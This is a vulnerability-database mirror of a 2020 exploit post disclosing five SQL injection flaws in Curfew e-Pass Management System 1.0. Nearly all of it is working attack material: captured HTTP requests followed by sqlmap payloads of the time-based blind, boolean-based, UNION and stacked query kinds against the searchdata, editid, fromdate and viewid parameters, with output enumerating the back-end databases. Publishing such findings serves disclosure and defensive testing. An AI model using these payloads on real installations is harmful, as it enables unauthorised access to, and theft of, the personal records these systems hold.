Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Curfew e-Pass Management System 1.0 SQL Injection

🗓️ 06 Aug 2020 00:00:00Reported by Mucahit KaradagType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 151 Views

Curfew e-Pass Management System 1.0 SQL Injection Vulnerabilitie

Code
`# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities  
# Google Dork: N/A  
# Date: 04.08.2020  
# Exploit Author: Mucahit Karadag  
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/  
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661  
# Version: 1.0  
# Tested on: Ubuntu Server 14.04.6 LTS  
# CVE : N/A  
  
###  
# Software Description:  
# Curfew Pass Management system is a web-based technology that will manage   
# the records of pass which issue by administrative. Curfew Pass Management   
# System is an automatic system that delivers data processing at a very high   
# speed in a systematic manner.  
#  
# Vulnerabilitiy Description:  
# Curfew e-Pass Management System 1.0 web application is vulnerable to  
# 5 different SQL injection vulnerabilities in multiple endpoints.  
# Vulnerabilities are listed in detail below.  
#   
# In summary, vulnerabilities are  
# Unauthenticated SQL Injection Identified on searchdata Parameter  
# Authenticated SQL Injection Identified on editid Parameter  
# Authenticated SQL Injection Identified on fromdate Parameter  
# Authenticated SQL Injection Identified on searchdata Parameter  
# Authenticated SQL Injection Identified on viewid Parameter  
###  
  
##  
## [Unauthenticated SQL Injection Identified on searchdata Parameter]  
##  
  
POST /cpms/index.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/index.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
searchdata=&search=  
  
"searchdata" parameter is vulnerable to SQL injection under the search feature in the main page.  
  
Parameter: searchdata (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=  
---  
[09:52:09] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.12  
[09:52:10] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on editid Parameter]  
##  
  
GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/manage-category.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
  
"editid" parameter is vulnerable to SQL injection on HTTP GET rquest to /admin/edit-category-detail.php endpoint.  
  
---  
Parameter: editid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: editid=1 AND 4435=4435  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: editid=1;SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 3 columns  
Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -  
---  
[09:54:59] [INFO] testing MySQL  
[09:54:59] [INFO] confirming MySQL  
[09:54:59] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[09:54:59] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on fromdate Parameter]  
##  
  
POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
fromdate=2020-08-04&todate=2020-08-26&submit=  
  
---  
Parameter: fromdate (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=  
---  
[09:58:36] [INFO] testing MySQL  
[09:58:36] [INFO] confirming MySQL  
[09:58:36] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[09:58:36] [INFO] fetching database names  
[09:58:36] [INFO] fetching number of databases  
[09:58:36] [INFO] resumed: 5  
[09:58:36] [INFO] resuming partial value: informat  
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)  
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]  
  
[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions  
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times  
[09:59:37] [INFO] retrieved: cpms  
[09:59:37] [INFO] retrieved: information_schema  
[10:00:56] [INFO] retrieved: mysql  
[10:02:25] [INFO] retrieved: performance_schema  
[10:03:41] [INFO] retrieved: phpmyadmin  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on searchdata Parameter]  
##  
  
POST /cpms/admin/search-pass.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/search-pass.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
searchdata=asd&search=  
  
---  
Parameter: searchdata (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=  
---  
[10:10:57] [INFO] testing MySQL  
[10:10:57] [WARNING] reflective value(s) found and filtering out  
[10:10:57] [INFO] confirming MySQL  
[10:10:58] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[10:10:58] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
  
##  
## [Authenticated SQL Injection Identified on viewid Parameter]  
##  
  
GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
---  
Parameter: viewid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: viewid=3 AND 2054=2054  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -  
---  
[10:12:27] [INFO] testing MySQL  
[10:12:27] [INFO] confirming MySQL  
[10:12:28] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[10:12:28] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Aug 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
sql injectione-pass managementvulnerabilitiesweb-based technologyubuntu server 14.04.6 ltsdata processingunauthenticatedauthenticatedsearchdata parametereditid parameterfromdate parameterviewid parameter
151